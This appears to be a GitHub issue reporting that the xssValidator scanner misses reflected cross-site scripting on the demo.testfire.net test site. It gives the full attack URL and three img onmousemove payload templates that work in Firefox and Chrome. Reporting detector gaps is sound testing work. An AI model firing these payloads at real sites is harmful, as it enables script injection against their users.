False Negative
nslearnner opened this issue · 0 comments
nslearnner commented
Demo Site: demo.testfire.net
Full Request is:
http://demo.testfire.net/search.aspx?txtSearch=%3cimg%20src%3d8%20onmousemove%3d%22alert(299792458)%22%3e
Payloads below:
<img src=1 onmousemove="{JAVASCRIPT}">
<img src=1 onmousemove='{JAVASCRIPT}'>
<img src=1 onmousemove={JAVASCRIPT}>
I test on FF and Chrome, payloads is work. But xssValidator can't Detect.
How can I fix it?
Some info:
Firefox: v51.0.1
Chrome: v56.0.2924.87
xssValidator: v1.3.2
Phantomjs: v2.1.1